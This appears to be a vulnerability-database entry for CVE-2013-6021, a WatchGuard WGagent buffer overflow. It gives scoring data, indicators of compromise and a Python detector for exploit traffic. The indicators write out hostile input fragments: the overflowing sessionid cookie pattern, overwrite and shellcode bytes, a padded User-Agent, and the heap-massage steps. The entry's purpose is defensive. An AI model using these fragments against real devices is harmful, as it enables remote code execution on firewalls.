CVE-2013-6021
published 2013-10-19

CVE-2013-6021: Buffer overflow in WGagent in WatchGuard WSM and Fireware before 11.8 allows remote attackers to execute arbitrary code via a long sessionid value in a cookie.

Priority: P258, critical, 9.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 12.20% (95.7th percentile)

Affected

12 ranges
Vendor | Product | Version range | Fixed in
watchguard | fireware | <= 11.7.4 |
watchguard | fireware | |
watchguard | fireware | |
watchguard | fireware | |
watchguard | fireware | |
watchguard | fireware | |
watchguard | fireware | |
watchguard | fireware | |
watchguard | fireware | |
watchguard | fireware | |
watchguard | fireware | |
watchguard | fireware | |

Detection & IOCs (extracted from sources)

url: /agent/ping
url: /ping
port: 8080
command: Cookie: sessionid=<140 x 'A'>\x44\x85
ua: a(x100)Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:23.0) Gecko/20100101 Firefox/23.0 a(x100)
bytes: \x8b\x41\x24\x29\xd0\x83\xc0\x40\x83\xe8\x35
  • Detect oversized sessionid cookie values in HTTP requests to /agent/ping on port 8080 (SSL); a sessionid value exceeding 120 characters (and especially 140+) is anomalous and indicative of exploitation.
  • Detect HTTP requests to /agent/ping with abnormally large User-Agent headers (e.g., >1800 bytes) combined with a Cookie header containing a sessionid field, targeting WatchGuard WGagent on port 8080.
  • Detect HTTP requests to /agent/ping with an Accept-Encoding header padded with large amounts of repeated bytes (e.g., 'b' x 1386), which is used to position shellcode in the exploit.
  • The exploit targets WatchGuard Fireware/WSM versions before 11.8; version fingerprinting of WGagent can help identify vulnerable instances.
  • The exploit hardcodes a target IP (192.168.60.200) and port (8080) for the WatchGuard XTM web console; real-world deployments may use different ports or IPs. Detection rules should not rely solely on these values.
  • The shellcode is alpha2-encoded to avoid bad characters (null bytes, control characters, spaces, quotes, ampersands, semicolons, and cookie delimiters); signature-based detection must account for this encoding and cannot rely on raw shellcode bytes alone.
  • The exploit uses SSL (IO::Socket::SSL) for all communications; network-level detection requires SSL/TLS inspection to inspect cookie and header contents.
  • The exploit uses a two-phase heap massage approach (step1: non-overflowing sessionid of 120 'A's to shape the heap; step2: overflowing sessionid of 140 bytes + 2-byte overwrite); detection must consider both request patterns.
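
The request-level checks from the notes above, as an added example (not code from the exploit, the vendor or this database). It assumes decrypted requests are available, for instance from a TLS-inspecting proxy; the 120 and 1800 thresholds come from the notes, while the rule names, the 64-byte padding-run threshold and the sample host are assumptions.

```python
import re

PATH = b"/agent/ping"
SESSIONID_MAX = 120   # from the notes: longer sessionid values are anomalous
UA_MAX = 1800         # from the notes: User-Agent size threshold in bytes
PAD_RUN = 64          # assumption: run of one repeated byte treated as padding

def parse_request(raw):
    """Split a decrypted HTTP request into (path, {lower-cased header: value})."""
    lines = raw.split(b"\r\n\r\n", 1)[0].split(b"\r\n")
    parts = lines[0].split(b" ")
    path = parts[1].split(b"?", 1)[0] if len(parts) >= 2 else b""
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return path, headers

def sessionid_value(cookie):
    """Return the raw sessionid value from a Cookie header, or None if absent."""
    for pair in cookie.split(b";"):
        name, sep, value = pair.strip().partition(b"=")
        if sep and name.lower() == b"sessionid":
            return value
    return None

def findings(raw):
    """Return the names of the rules a request to /agent/ping trips."""
    path, headers = parse_request(raw)
    if path != PATH:
        return []
    hits = []
    sid = sessionid_value(headers.get(b"cookie", b""))
    if sid is not None:
        if len(sid) >= SESSIONID_MAX:  # exactly 120 matches the heap-shaping request
            hits.append("sessionid-oversized" if len(sid) > SESSIONID_MAX else "sessionid-at-limit")
        if any(b < 0x21 or b > 0x7E for b in sid):
            hits.append("sessionid-non-printable")
        if len(headers.get(b"user-agent", b"")) > UA_MAX:
            hits.append("user-agent-oversized")
    if re.search(rb"(.)\1{%d,}" % (PAD_RUN - 1), headers.get(b"accept-encoding", b""), re.S):
        hits.append("accept-encoding-padded")
    return hits

def sample(sid, ua=b"Mozilla/5.0", ae=b"gzip"):
    """Build a constructed request for exercising the rules (not captured traffic)."""
    return (b"GET /agent/ping HTTP/1.1\r\nHost: fw.example\r\nUser-Agent: " + ua +
            b"\r\nAccept-Encoding: " + ae + b"\r\nCookie: sessionid=" + sid + b"\r\n\r\n")
```

Both request patterns are reported separately, so a 120-byte sessionid followed by a longer one from the same client can be correlated downstream.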